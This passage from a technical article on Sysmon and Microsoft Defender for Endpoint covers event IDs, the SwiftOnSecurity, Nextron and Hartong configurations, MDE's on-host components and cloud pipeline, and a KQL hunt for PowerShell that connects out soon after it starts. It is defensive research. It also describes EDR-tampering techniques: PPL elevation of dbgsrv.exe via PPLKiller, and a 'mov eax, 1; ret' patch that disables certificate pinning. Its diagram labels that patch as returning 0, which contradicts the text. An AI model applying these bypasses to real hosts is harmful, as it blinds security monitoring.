20	WmiEvent (consumer)	WMI ETW provider consumer	v6.10 (mid-2017)	(Sysmon-only)
21	WmiEvent (consumer-to-filter binding)	WMI ETW provider consumer	v6.10 (mid-2017)	(Sysmon-only)
22	DNSEvent (DNS query)	ETW consumer of `Microsoft-Windows-DNS-Client`	v10.0 (Jun 2019)	`DeviceNetworkEvents` (`DnsQuery`)
23	FileDelete (archive)	Filter Manager	v11.10 (Jun 2020)	`DeviceFileEvents` (partial)
24	ClipboardChange	RDP and Win32 clipboard hooks	v13.0 (2021; disputed)	(Sysmon-only)
25	ProcessTampering	Image-load and `WriteProcessMemory` heuristic	v13.0 (2021; disputed)	(Sysmon-only)
26	FileDeleteDetected	Filter Manager (non-archiving)	v13.30 (2022)	`DeviceFileEvents`
27	FileBlockExecutable	Filter Manager (blocking)	v14.0 (Aug 2022)	(Sysmon-only)
28	FileBlockShredding	Filter Manager (blocking)	v14.10 (2022)	(Sysmon-only)
29	FileExecutableDetected	Filter Manager	v15.0 (Jun 2023)	`DeviceFileEvents`
255	Error	Sysmon-internal	v1.0 (Aug 2014)	(Sysmon-only)

The Sysmon Version History repository's "Outdated" disclaimer ("I didn't find enough time to update this repo - sorry") means the v12 vs v13 boundary for ClipboardChange and ProcessTampering is community-disputed. The canonical Microsoft Learn page does not enumerate version-introduction metadata per event ID. The dates in the table for EIDs 24 and 25 are best-effort community attributions and should be treated as approximate until Microsoft publishes a per-EID version history [@sysmon-version-history][@sysmon-ms-learn].

The design intent, in one sentence

The catalogue exists because Sysmon's design choice -- the one Microsoft Learn still prints today -- explicitly refuses to do detection. The publisher emits structured events; the detection logic is somebody else's problem.

Sysmon does not provide analysis of the events it generates, nor does it attempt to hide itself from attackers.

This is the sentence that explains the entire SwiftOnSecurity-NextronSystems-Hartong configuration lineage [@sysmon-ms-learn]. If Sysmon refuses to do detection, somebody has to write the rules. Three somebodies did, and they wrote three different sets, and the rest of §5 is about the trade-offs between them.

What EID 27 is, and what it is not

The 2022 introduction of FileBlockExecutable (EID 27) was the first preventive event in Sysmon's history. Olaf Hartong's contemporaneous writeup and Diversenok's independent reproduction both describe what the event does, and the mechanism is more subtle than "the I/O is denied." The Sysmon minifilter intercepts the file-handle close operation. If the rule matches and the file content carries an MZ/PE header, Sysmon logs EID 27 and marks the file for deletion via FILE_DISPOSITION_INFORMATION [@diversenok-2022][@hartong-sysmon14-medium]. The attacker's cmd /c copy mimikatz.exe C:\Users\Public\ produces no command-line error. The copy appears to succeed. The file is then deleted at handle-close time. Hartong's writeup captures the user-visible effect verbatim: "*While there is no error on the command line, the file is not written to disk*" [@hartong-sysmon14-medium]. Diversenok's reverse-engineering reads: "*Sysmon monitors and deletes files on closing instead of writing*" [@diversenok-2022]. The closing-time semantics is the structural reason Diversenok's Bypass #1 (split create-close from open-write-close) works at all; the bypass is incoherent under an Access Denied-at-create model and obvious under the close-time-delete model.

This is a confined preventive surface, and it should not be confused with the much larger Defender exploit-protection blocking surface. Defender exploit protection mitigations include arbitrary-code-guard, control-flow-guard enforcement, and ASR rules -- they sit inside the Defender Antivirus and MDE stacks. EID 27's blocking is one Sysmon minifilter making a file-create decision; it is not a general-purpose application-allow-list, and it is not a substitute for Windows Defender Application Control. Hartong's writeup is explicit about the scope -- "the FileBlockExecutable event" -- as is Diversenok's: the introduction reads "the update introduced the first preventive measure -- the FileBlockExecutable event (ID 27)" [@diversenok-2022].

Twenty-nine events, four hardening releases, one schema. The catalogue is only useful if you configure Sysmon to emit subsets of it, and configuration is where the field's three lineages diverged.

5. Three Canonical Sysmon Configurations

Every production Sysmon deployment in the field is forked from one of three repositories. The lineage matters, and one of the things this article fixes is a common attribution error -- "Florian Roth wrote the canonical Sysmon config" is in widespread circulation, but the canonical root is SwiftOnSecurity's repository, and Roth's repo is a 2018 fork of it.

The open-source generic-signature-format authored by Florian Roth and his collaborators at Nextron Systems; the SIEM-and-EDR field's vendor-neutral detection-rule lingua franca. The `SigmaHQ/sigma` repository ships over 3,000 detection rules covering the Windows kernel-callback surface (heavily Sysmon-aware), Linux audit, macOS unified log, AWS CloudTrail, Microsoft 365, and other event sources. Sigma rules are written once and compiled by community converters into the per-tool query languages (KQL for Defender XDR / Sentinel, SPL for Splunk, EQL for Elastic) [@github-sigma].

SwiftOnSecurity/sysmon-config (February 2017)

The historical root. The pseudonymous account SwiftOnSecurity published the first widely-cited Sysmon configuration template on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. The README's design intent is the single sentence still printed at the top of the repo: "This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing" [@github-swiftonsecurity]. The template emphasises clarity over coverage; the XML is heavily commented, and the rule structure follows a deliberately conservative pattern of <Include> blocks per technique.

SwiftOnSecurity's config is the most-cited starting point for Sysmon deployments worldwide and the one that detection-engineering tutorials default to. It is also the parent of every other Sysmon-config repository on GitHub, in the literal GitHub-fork sense -- the GitHub REST API for both NextronSystems/sysmon-config and (via the historical fork-graph) other community configs returns SwiftOnSecurity/sysmon-config as the parent [@github-nextronsystems-meta].

Neo23x0/sysmon-config, now NextronSystems/sysmon-config (January 2018, renamed 2021)

Florian Roth, working under his GitHub handle @Neo23x0, forked SwiftOnSecurity's config in January 2018 and added blocking-rule support for Sysmon v14 plus the merged community pull-request set. The README's design intent reads: "This is a forked and modified version of @SwiftOnSecurity's sysmon config. ... We merged most of the 30+ open pull requests" [@github-neo23x0]. The maintainer roster as of the present writing is Florian Roth (@Neo23x0), Tobias Michalski (@humpalum), Christian Burkard (@phantinuss), and Nasreddine Bencherchali (@nas_bench).

The repository ships a blocking variant, sysmonconfig-export-block.xml, that adds <RuleGroup> blocks targeting EID 27 (FileBlockExecutable) and EID 28 (FileBlockShredding) for the most common malware-staging file paths. This is the variant SOC teams deploy when they want Sysmon's preventive surface to participate in the response pipeline as a hard block rather than as a detection-only artifact.

The legacy URL `https://github.com/Neo23x0/sysmon-config` now HTTP-301 redirects to `https://github.com/NextronSystems/sysmon-config`. The GitHub REST API for the current repository returns `created_at: 2021-07-24T06:19:41Z` with `parent: SwiftOnSecurity/sysmon-config`, which means the repository as it now exists was created in mid-2021 when Florian Roth moved it from his personal handle to his employer's organization namespace [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; the move is an organizational one. The exact pre-rename creation date of the original `Neo23x0/sysmon-config` repository is not reliably retrievable from the current API and is best dated as January 2018 based on the README and the fork-history.

olafhartong/sysmon-modular (January 13, 2018)

Olaf Hartong's sysmon-modular was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository's design takes a different shape from the monolithic SwiftOnSecurity and NextronSystems configs: instead of one carefully-tuned XML, Hartong publishes a per-EID-per-technique module library that compiles into one of five pre-generated artifacts plus an arbitrary number of custom builds [@github-hartong-modular]. The pre-generated variants are:

sysmonconfig.xml -- the default deployment baseline.
sysmonconfig-with-filedelete.xml -- default plus the EID 23 archive variant of file delete, which preserves the deleted file in C:\Sysmon\ (volume-cost trade-off; recommend dedicated drive).
sysmonconfig-excludes-only.xml -- the verbose variant, which captures everything except a small set of well-known exclusions; useful for detection-engineering R&D on a single host.
sysmonconfig-research.xml -- the super-verbose variant, with the README's standing warning: "really DO NOT USE IN PRODUCTION!" -- this is for live-malware-sample analysis in a sandbox, not for fleet rollout.
sysmonconfig-mde-augment.xml -- the variant whose entire design intent is to augment Microsoft Defender for Endpoint's collection surface "to have as little overlap as possible" with what MDE already captures [@github-hartong-modular].

The MDE-augment config is the artifact this article keeps returning to. It is the operational answer -- maintained by a person, not by Microsoft -- to the question of which Sysmon events are worth collecting on a host that already has MDE installed. We will return to its specific contents in §10. For now, the key observation is that this config exists because of a documented absence: Microsoft has not published a per-ActionType cross-walk between MDE's Device* schema and Sysmon's manifest, so Hartong reverse-engineered one.

Side-by-side comparison

Dimension	SwiftOnSecurity/sysmon-config	NextronSystems/sysmon-config (formerly Neo23x0)	olafhartong/sysmon-modular
Author / org	SwiftOnSecurity (pseudonymous)	Florian Roth + Nextron Systems team	Olaf Hartong (and FalconForce collaborators)
Created	Feb 1, 2017	Forked Jan 2018; renamed Jul 24, 2021	Jan 13, 2018
Distribution	One monolithic XML	Two XMLs (audit + blocking)	Modular per-technique + five pre-generated builds
Design philosophy	Quality starting point, conservative	Community-maintained, blocking-aware	Tunable modular, MITRE ATT&CK-mapped
Best used for	First-time Sysmon deployment	Standalone Sysmon at scale	Sysmon alongside MDE, or per-team customization
Pre-generated v14+ blocking	No (audit only)	Yes (`sysmonconfig-export-block.xml`)	Yes (built from blocking modules)
MDE coexistence variant	No	No	Yes (`sysmonconfig-mde-augment.xml`)

Choosing among the three

The detection-engineering trade-off framing is short. Pick SwiftOnSecurity when you want a clean, well-commented starting point and you are not yet sure which events you actually need. Pick NextronSystems when you want a community-maintained baseline that already has the blocking rules for Sysmon v14+. Pick Hartong when you want fine-grained per-technique tunability or, more commonly, when you are running MDE and need Sysmon to augment rather than duplicate it.

Tactical caution worth one inline note: Sysmon supports one active configuration at a time. There is no aggregate-multiple-XMLs feature at the driver layer. Hartong's modular approach generates a single merged XML at build time; the production fleet receives that single XML and the driver enforces it. If you are trying to run two configurations side by side -- one for the SOC's hunting, one for the platform team's audit -- pick one, merge the rules, and ship the combined product. The deployment tooling in sysmon-modular is built around exactly this constraint.

All three configurations assume the same thing: either Sysmon is the only EDR on the host (a deployment posture that exists in air-gapped, regulatory-no-cloud, or unlicensed environments) or it is augmenting an EDR whose collection surface is known. The augment case is the one where the field has converged on Hartong. To understand why, we have to look at what the other EDR -- Microsoft's own -- actually collects on the host.

6. Microsoft Defender for Endpoint: The Documented On-Host Surface

Two questions about MDE have very different answers. What does Microsoft Defender for Endpoint run on this host? has a primary-source-quality answer from Microsoft Learn. What does it actually do? has only a community-observed answer. The documented surface is the user-mode component inventory plus registry hives and event sources. The community-observed surface includes the kernel-callback inventory, the cloud TLS-pinning details, and the inter-process communication paths -- none of which Microsoft has published. Naming both halves with the right citations on each side is one of the few things this article does that other writeups skip.

The documented surface (Microsoft Learn, primary)

On every onboarded Windows endpoint, Microsoft Defender for Endpoint installs and runs a Windows service named Sense, whose display name is "Microsoft Defender for Endpoint Service" and whose backing executable is MsSense.exe. The on-host troubleshooting page documents the canonical health-check command: sc query sense [@sense-troubleshoot]. On Windows Server 2019, Server 2022, Server 2025, and Azure Stack HCI 23H2 or later, MDE is delivered as a Feature on Demand with the capability name Microsoft.Windows.Sense.Client~~~~. Microsoft documents the verification command verbatim: "DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~" [@sense-troubleshoot][@ms-server-endpoints-learn].

Onboarding state is recorded under two registry hives that Microsoft Learn names explicitly:

HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection -- the policy-driven configuration surface.
HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status -- the run-time onboarding state.

Onboarding diagnostics land in the WDATPOnboarding event source under the Application event log, with documented event IDs 5, 10, 15, 30, 35, 40, 65, and 70, each of which corresponds to a specific failure mode with a specific resolution procedure [@sense-troubleshoot]. The product installs to C:\Program Files\Windows Defender Advanced Threat Protection\ (the legacy path is preserved even after the September 2020 rebrand).

The documented surface stops here. Microsoft Learn names MsSense.exe, the Sense service, the registry hives, the event source, the Feature on Demand, and the four operating systems. Microsoft Learn does not publish a kernel-callback inventory for the MDE EDR sensor.

The community-observed surface

Past the documented boundary, what is in field-published primary sources is the user-mode binary inventory and the cloud-side TLS path. Three companion binaries sit alongside MsSense.exe:

SenseCncProxy.exe is the cloud-command-and-control proxy. This is the binary that holds the TLS connection out to Defender XDR ingest, applies the certificate-pinning policy, and shuttles agent-bound commands (live-response actions, custom-detection-rule pushes, sensor-configuration updates) back down to MsSense.exe.
SenseIR.exe is the live-response and investigation actions binary. When a SOC analyst clicks Run script or Collect investigation package in the Defender XDR portal, SenseIR.exe is the process that fulfils the request on the endpoint side.
SenseNdr.exe is the network detection and response component, responsible for endpoint-side enrichment of network observations used in the DeviceNetworkEvents table.

These binaries are not enumerated on Microsoft Learn in the same way the Sense service itself is. They are documented in MDE incident-response runbooks, in third-party reverse-engineering posts, and in the file-system signature data on any onboarded endpoint. The article treats their existence as community-observed. SenseIR.exe is corroborated by InfoGuard 2025's reverse-engineering of MDE's live-response cloud path [@infoguard-2025]; SenseNdr.exe in particular lacks an explicit community primary writeup as of 2026 -- its role here is inferred from its on-disk binary metadata and the file-system signature data on onboarded endpoints.

The kernel-side surface MDE shares with Defender Antivirus is documented in the Defender Antivirus product line [@ms-defender-av-arch]:

WdBoot.sys is the Early-Launch Antimalware (ELAM) driver. It is the first non-Windows driver to load at boot and gates which non-ELAM drivers are allowed to load after it. It is signed with the Antimalware Extended Key Usage, 1.3.6.1.4.1.311.61.4.1 [@ms-learn-elam-sample].
WdFilter.sys is the Defender Antivirus file-system minifilter. It sits alongside SysmonDrv.sys at a different Filter Manager altitude.
WdNisDrv.sys is the Network Inspection System driver, which provides the host-firewall-augmenting NIS layer.

A Windows process-protection level, introduced in Vista (as Protected Process, for DRM) and extended in Windows 8.1 (for antimalware), that prevents user-mode debugger attach, code injection, and `OpenProcess` for write from any caller that does not itself run at an equal or higher PPL signer level. Antimalware-PPL (`PROTECTED_ANTIMALWARE_LIGHT`) is the level reserved for security products signed with the Antimalware EKU; `MsSense.exe` and Sysmon v15+ both run at this level. The Windows boot-order privilege that lets a driver signed with the Antimalware EKU `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample] load before any non-ELAM driver and classify subsequent boot-start drivers as `Good`, `Bad`, or `Unknown` so the kernel can decide which to load. The ELAM driver *itself* is measured (along with the bootloader, kernel, and other early-boot artefacts) into TPM PCRs by Windows's *Measured Boot*, which is a separate boot-integrity feature; ELAM's job is to classify, not to measure. Defender Antivirus's `WdBoot.sys` is the canonical ELAM driver. Sysmon's `SysmonDrv.sys` is *not* ELAM-signed; this is the pre-driver-load horizon discussed in §12. The Authenticode Extended Key Usage `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample], issued by Microsoft to security vendors after a code-signing and behavioral review. The EKU gates two distinct things: ELAM signing eligibility (so the driver loads first) and Antimalware-PPL eligibility for the user-mode service (so the service is harder to tamper with). MDE's `MsSense.exe`, Defender Antivirus's `MsMpEng.exe`, and Sysmon v15+ all carry this signature path.

Antimalware-PPL on MsSense.exe

The MsSense.exe service runs as Antimalware-PPL -- PROTECTED_ANTIMALWARE_LIGHT in the kernel data structure. The protection level prevents an attacker with SYSTEM privileges from attaching a user-mode debugger, suspending the service, or injecting code into its address space using ordinary Windows debugging or code-injection APIs. This is the same protection level Sysmon v15+ runs at, and it is the same level Defender Antivirus's MsMpEng.exe has run at since Windows 8.1. The structural defense closes user-mode tampering as a class. The residual attack surface is kernel-mode primitives -- which is what FalconForce had to use in 2022 to debug MDE [@falconforce-2022].

The dispositive reverse-engineering primary: FalconForce 2022

Olaf Hartong and Henri Hambartsumyan, working at FalconForce, published the most-cited reverse-engineering writeup of MDE's on-host architecture in 2022. The post's TL;DR captures both the debug-bypass technique and the cloud vulnerability that resulted from applying it:

You can debug MDE running on an endpoint by running `dbgsrv.exe` and raising its PPL protection to WinTcb. This can be used to snoop on data being transmitted by MDE to the cloud. We identified a vulnerability related to missing authorization checks of data sent from the MDE endpoint to the M365 cloud, allowing anyone to send spoofed data to any M365 tenant.

The technique is precise [@falconforce-2022]. FalconForce raised the PPL signer level of Windows's PE debug server (dbgsrv.exe) to WinTcb -- a signer level higher than Antimalware-PPL -- and used the elevated debug server to attach to MsSense.exe. From inside that debug session they instrumented SspiCli!EncryptMessage, the SSPI function MDE's cloud transport uses to wrap each outbound message before TLS encryption, and captured the plaintext payloads. The plaintext capture surfaced CVE-2022-23278: a missing-authorization vulnerability in which the M365 cloud trusted whatever device-identifying claims the endpoint asserted, with no cross-check that the asserting endpoint owned the device identity it claimed [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. Microsoft patched the vulnerability on March 8, 2022, with a public acknowledgement to FalconForce: "Microsoft released a security update to address CVE-2022-23278 in Microsoft Defender for Endpoint. This important class spoofing vulnerability impacts all platforms. We wish to thank Falcon Force for the collaboration on addressing this issue through coordinated vulnerability disclosure" [@msrc-cve-2022-23278].

Note: The kernel-and-Defender-Antivirus surface MDE shares (WdBoot.sys ELAM, WdFilter.sys minifilter, WdNisDrv.sys NIS) is documented. The specific callback inventory the MDE EDR sensor itself registers is not. The community's best-published primary for what MsSense.exe actually does is the FalconForce 2022 reverse-engineering writeup -- and it covers a narrow slice (TLS interception and one cloud-authorization bug), not a full callback list. The Hartong sysmonconfig-mde-augment.xml config exists as a community-curated artifact precisely because Microsoft has not published a per-ActionType-to-per-kernel-callback cross-walk. The most-cited operational config in the field is downstream of a documentation gap. This is the second aha moment of the article.

Putting the on-host pieces together

flowchart TD B["WdBoot.sys (ELAM, Antimalware EKU)"] -.boot order.-> F["WdFilter.sys (file minifilter)"] B -.boot order.-> N["WdNisDrv.sys (Network Inspection)"] F --> M["MsSense.exe (Antimalware-PPL aggregator)"] N --> M M --> IR["SenseIR.exe (Live Response)"] M --> NDR["SenseNdr.exe (Network Detection)"] M --> P["SenseCncProxy.exe (cloud forwarder)"] P -- "TLS + certificate pinning" --> C["Defender XDR ingest (regional Kusto)"]

The picture is asymmetric: the kernel-driver substrate at the top is documented in the Defender Antivirus product line; the user-mode service inventory in the middle is documented for MsSense.exe and partly documented for the companion binaries; the cloud transport at the bottom is documented at the API-contract level (TLS, certificate pinning) but the specific endpoints and the on-the-wire payload format are reverse-engineered. The community published primaries -- FalconForce 2022 above the line, InfoGuard Labs 2025 below it -- are how the field knows what they know about the cloud-bound payload. Which is the next layer.

7. The Cloud Pipeline: SenseCncProxy.exe to Defender XDR Ingest

The wire between MsSense.exe and Microsoft's cloud is TLS with certificate pinning. It is also, twice in the last four years, the place where the most interesting Defender for Endpoint vulnerabilities have lived. The 2022 round closed one of them. The 2025 round is still open as of this article's writing.

Certificate pinning and the FalconForce 2022 method

MsSense.exe does not trust whatever the Windows certificate store says about the chain to Defender XDR ingest. It pins the certificate. FalconForce's bypass is the one §6 already named: raise dbgsrv.exe to WinTcb PPL, attach the elevated debug server to MsSense.exe, instrument SspiCli!EncryptMessage to capture the plaintext payload before TLS encryption [@falconforce-2022].The specific PPL elevation technique is published in the same writeup. PPLKiller's /enablePPL patch writes the Antimalware-PPL bit into dbgsrv.exe's _EPROCESS.Protection field at the highest signer level (WinTcb). The result: a PE debug server running at a PPL level above Antimalware-PPL, with OpenProcess rights against any Antimalware-PPL target [@falconforce-2022]. This requires SYSTEM plus a kernel primitive, typically delivered via BYOVD.

The InfoGuard Labs 2025 follow-up took a different route to the same problem. Instead of reading plaintext before TLS encryption, InfoGuard patches the certificate-chain validation function in memory so the endpoint certificate is no longer checked at all. Any local TLS-stripping proxy can then intercept the wire. The verbatim patch is two CPU instructions written into CRYPT32!CertVerifyCertificateChainPolicy: "mov eax, 1; ret" -- which forces the function to return success without performing any actual chain check [@infoguard-2025].

With the pinning gate disabled, InfoGuard's team observed the on-the-wire protocol. The cloud-bound payload goes to two endpoint families: /edr/commands/cnc for command-and-control and /senseir/v1/actions/ for live-response actions. The vulnerability they then disclosed is that both endpoint families accept "data sent from the MDE endpoint to the cloud ... without validating authentication tokens, allowing a post-breach attacker with a machine's ID to hijack the command-and-control channel" [@infoguard-2025]. Microsoft's response, verbatim: "All findings were reported to the Microsoft Security Response Center (MSRC) in July 2025. However, Microsoft has classified them as low severity and has not committed to a fix" [@infoguard-2025].

FalconForce 2022 found a missing-authorization bug in the cloud's trust path. CVE-2022-23278 was patched. InfoGuard Labs 2025 found a different missing-authorization pattern in different cloud endpoints -- different bug, same class -- and the disclosure record says Microsoft has not committed to a fix. The cloud trusts whatever the endpoint claims about itself far enough that the same authorization gap keeps surfacing. The arc that began with the March 2022 spoofing-CVE patch is not closed. This is the third aha moment of the article, surfaced again in §11.

What the cloud does on arrival

Once SenseCncProxy.exe has TLS-shipped the event over the wire to the regional Defender XDR ingest endpoint, two things happen on the cloud side. First, the event lands in the Advanced Hunting Kusto cluster. Microsoft Learn's verbatim freshness claim is: "Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services" [@advanced-hunting-overview]. "Almost immediately" is empirically a few seconds in steady state, which is exactly what Maya saw in §1: a row with Timestamp three seconds in the past.

Second, the event is replicated for use by Microsoft's built-in detection rules, MITRE-mapped queries, and the cross-domain correlation surface that joins endpoint events to email events, identity events, and cloud-application events. The cross-domain join is one of the most-cited reasons enterprises stay on the licensed product rather than fall back to standalone Sysmon: KQL can join DeviceProcessEvents to EmailEvents to IdentityLogonEvents in one query, and Sysmon-only deployments cannot do that without a separate SIEM doing the cross-source enrichment.

Data residency is documented at the regional level in the MDE configure-server-endpoints page: "data is stored in the US for customers in the USA; in EU for European customers; and in the UK for customers in the United Kingdom" [@ms-server-endpoints-learn]. Retention in-portal is the same quota for all geographies: "Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data" [@advanced-hunting-overview]. Past 30 days, the customer has to extend the retention surface via Microsoft Sentinel's per-table archiving, which is the operational story §9 picks up.

The event's journey, end to end

sequenceDiagram participant K as Kernel callback (WdFilter or SysmonDrv) participant S as MsSense.exe (Antimalware-PPL) participant P as SenseCncProxy.exe participant CP as CRYPT32!CertVerifyCertificateChainPolicy participant C as Defender XDR ingest (regional Kusto) participant Q as DeviceProcessEvents table K->>S: Synchronous callback notification Note over S: Enrich (parent PID, hashes, identity, ProcessGuid) S->>S: SspiCli!EncryptMessage (FalconForce 2022 plaintext capture point) S->>P: IPC to cloud forwarder P->>CP: Validate Defender XDR certificate chain CP-->>P: Pinned chain OK (InfoGuard 2025 bypass: patch CP to return 0 unconditionally) P->>C: HTTPS POST /edr/commands/cnc or /senseir/v1/actions/ C->>Q: Write into Kusto cluster Note over Q: "Almost immediately" -- seconds end to end Q-->>K: Queryable via KQL

The diagram is annotated with the two community-disclosed interception points because they are the two places the field has actually been able to observe what is on the wire. Between SspiCli!EncryptMessage (where the plaintext payload exists) and CRYPT32!CertVerifyCertificateChainPolicy (where the certificate chain gets validated), the path is otherwise opaque to external researchers. The Microsoft-published side of the story is the contractual one: TLS, certificate pinning, regional ingest, Kusto cluster, KQL exposure. The reverse-engineered side fills in the rest.

Within seconds, the event appears as a row in DeviceProcessEvents. The reader-side schema is where the analyst lives. So: what columns?

8. Six `Device*` Tables and One Worked KQL Query

Every detection rule in Microsoft Defender XDR, every hunting query in Microsoft Sentinel, and every analyst pivot Maya does on her console is a KQL query against six load-bearing tables. Knowing those six tables is the price of admission to the Defender XDR field.

Microsoft's data-explorer query language, originally built for Azure Data Explorer (formerly Kusto). KQL reads as a pipeline of operators -- `where`, `project`, `summarize`, `join`, `order by` -- left to right. Advanced Hunting in Microsoft Defender XDR and analytics queries in Microsoft Sentinel both expose the same KQL dialect; the same query text can be moved between the two surfaces with only the table-name namespace changing [@advanced-hunting-overview][@sentinel-xdr-connector].

The six tables

The six tables that this article calls "load-bearing" are the ones that map most cleanly to Sysmon's manifest and that detection rules join against most often:

DeviceProcessEvents -- the canonical reader-side analogue of Sysmon's EID 1 (ProcessCreate) and EID 5 (ProcessTerminate). The schema reference page names roughly fifty columns including Timestamp, DeviceId, DeviceName, ActionType, FileName, FolderPath, SHA1, SHA256, MD5, FileSize, ProcessId, ProcessCommandLine, ProcessIntegrityLevel, ProcessTokenElevation, ProcessCreationTime, AccountSid, AccountName, AccountUpn, LogonId, and the full InitiatingProcess* family of parent-process columns [@deviceprocessevents-table].
DeviceNetworkEvents -- the analogue of Sysmon EID 3 (NetworkConnect) plus EID 22 (DNSEvent) and the MDE-only network-protection telemetry. Columns include RemoteIP, RemotePort, RemoteUrl, LocalIP, LocalPort, Protocol, RemoteIPType, and the InitiatingProcess* family [@sentinel-xdr-connector].
DeviceFileEvents -- the analogue of Sysmon EIDs 11 (FileCreate), 15 (FileCreateStreamHash), 23 (FileDelete archived), and 26 (FileDeleteDetected).
DeviceImageLoadEvents -- the analogue of Sysmon EID 7 (ImageLoad).
DeviceRegistryEvents -- the analogue of Sysmon EIDs 12-14 (RegistryEvent family).
DeviceEvents -- the miscellaneous catch-all. AMSI scan results, exploit-protection events, ASR rule fires, Network Protection blocks, and other MDE-specific events that do not fit cleanly into any of the per-event-class tables surface here as ActionType discriminators.

Past the six core tables there are siblings the article does not walk in detail but that detection engineers query alongside: DeviceLogonEvents (interactive, remote-interactive, network logons), DeviceFileCertificateInfo (Authenticode signer information), DeviceInfo and DeviceNetworkInfo (asset and posture). The cross-domain tables that the Defender XDR portal exposes -- AlertInfo, AlertEvidence, IdentityLogonEvents, EmailEvents, CloudAppEvents -- are also queryable from the same surface, and the cross-domain join is one of the load-bearing reasons SOC teams move queries from a standalone SIEM into Advanced Hunting [@sentinel-xdr-connector].

Sysmon EID to MDE table cross-walk

The cross-walk is the table detection engineers actually need at their desk. Every row is a Sysmon EID, the MDE table the analogous event lands in, the ActionType discriminator inside that table, and a fidelity rating relative to Sysmon's manifest -- because the MDE schema does not surface every Sysmon field, and the fidelity gaps are where Hartong's MDE-augment config earns its keep.

Sysmon EID	MDE table	ActionType	Fidelity vs Sysmon	Hartong-augment disposition
1 ProcessCreate	DeviceProcessEvents	ProcessCreated	Full	Drop (MDE covers)
3 NetworkConnect	DeviceNetworkEvents	ConnectionSuccess	Full	Drop
7 ImageLoad	DeviceImageLoadEvents	ImageLoaded	Full	Drop
8 CreateRemoteThread	DeviceEvents	RemoteThreadCreated	Truncated (no SourceImage hash)	Keep verbose
9 RawAccessRead	(none)	--	Omitted	Keep
10 ProcessAccess	DeviceEvents	OpenProcessApiCall	Truncated (no GrantedAccess mask)	Keep verbose, narrow targets
11 FileCreate	DeviceFileEvents	FileCreated	Full	Drop
12-14 RegistryEvent	DeviceRegistryEvents	RegistryValueSet etc.	Full	Drop
17-18 PipeEvent	(none)	--	Omitted	Keep
19-21 WmiEvent	(none)	--	Omitted	Keep
22 DNSEvent	DeviceNetworkEvents	DnsQuery	Full	Drop
23 FileDelete (archive)	DeviceFileEvents	FileDeleted	Partial (no archive)	Keep archive variant on selected paths
26 FileDeleteDetected	DeviceFileEvents	FileDeleted	Full	Drop
27 FileBlockExecutable	(none)	--	Omitted (MDE has separate prevent surface)	Keep if Sysmon is enforcing

The fidelity column is the operational answer to "do I need Sysmon if I have MDE?" Where MDE is Full, Sysmon duplicates. Where MDE is Truncated, Sysmon adds the fields MDE drops. Where MDE is Omitted, Sysmon is the only collection mechanism in the host's telemetry surface. This is the cross-walk that Hartong's sysmonconfig-mde-augment.xml implements as XML rules.

The Kusto Hunt: PowerShell instances that called out within sixty seconds of spawn

The single most-frequently-cited hunting query in the Defender XDR field is some variation of the following. The query joins DeviceProcessEvents to DeviceNetworkEvents on (DeviceId, InitiatingProcessId) and surfaces every PowerShell instance that opened an outbound network connection within sixty seconds of being spawned. This is the query that turns Maya's hunch ("that base64-encoded command looks bad") into a SIEM-routable signal:

// The Kusto Hunt: PowerShell instances that called out within
// 60s of process create, joined on (DeviceId, InitiatingProcessId).
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "powershell.exe" or FileName =~ "pwsh.exe"
| project DeviceId, ProcessId, ProcessCreationTime = Timestamp,
          ParentImage = InitiatingProcessFileName,
          ParentCmd   = InitiatingProcessCommandLine,
          ProcessCmd  = ProcessCommandLine,
          User        = AccountUpn
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp > ago(24h)
    | where ActionType == "ConnectionSuccess"
    | project DeviceId, InitiatingProcessId, NetTime = Timestamp,
              RemoteIP, RemotePort, RemoteUrl
) on DeviceId, $left.ProcessId == $right.InitiatingProcessId
| where (NetTime - ProcessCreationTime) between (0s .. 60s)
| where RemoteIP !startswith "10."
    and RemoteIP !startswith "192.168."
    and not(RemoteIP matches regex "^172\\.(1[6-9]|2[0-9]|3[0-1])\\.")
| project DeviceId, ProcessCreationTime, NetTime,
          ParentImage, ProcessCmd, RemoteIP, RemotePort, RemoteUrl, User
| order by NetTime desc

The query is twelve operative lines and exercises four of KQL's most useful primitives: join (on a tuple key), between (for time-window matching), !startswith and the regex check (for RFC 1918 exclusion), and project (for column shaping). The between (0s .. 60s) is the crux. A legitimate PowerShell launched by a logon script may also produce a network connection within the same minute -- the filter is necessary but not sufficient. Adding ParentImage in ("winword.exe", "excel.exe", "outlook.exe") narrows the hunt to the Office-spawning-PowerShell pattern that fits the Emotet and Qbot families. Adding RemoteUrl in (~CustomTI) narrows the hunt further to known-bad indicators from the tenant's threat-intelligence list.

{` // JavaScript that walks through the logic of the KQL hunt. // The actual query runs in Advanced Hunting; this runs in your browser // so you can see the join semantics with a small synthetic dataset.

const processEvents = [ { DeviceId: "D1", ProcessId: 7700, Timestamp: 100, FileName: "powershell.exe", InitiatingProcessFileName: "WINWORD.EXE", ProcessCommandLine: "powershell.exe -enc JABzAD0A..." }, { DeviceId: "D2", ProcessId: 4422, Timestamp: 200, FileName: "powershell.exe", InitiatingProcessFileName: "explorer.exe", ProcessCommandLine: "powershell.exe -Help" }, ];

const networkEvents = [ { DeviceId: "D1", InitiatingProcessId: 7700, Timestamp: 130, ActionType: "ConnectionSuccess", RemoteIP: "185.243.115.84", RemotePort: 443 }, { DeviceId: "D2", InitiatingProcessId: 4422, Timestamp: 215, ActionType: "ConnectionSuccess", RemoteIP: "10.0.0.5", RemotePort: 443 }, ];

function isPrivate(ip) { return ip.startsWith("10.") || ip.startsWith("192.168.") || /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip); }

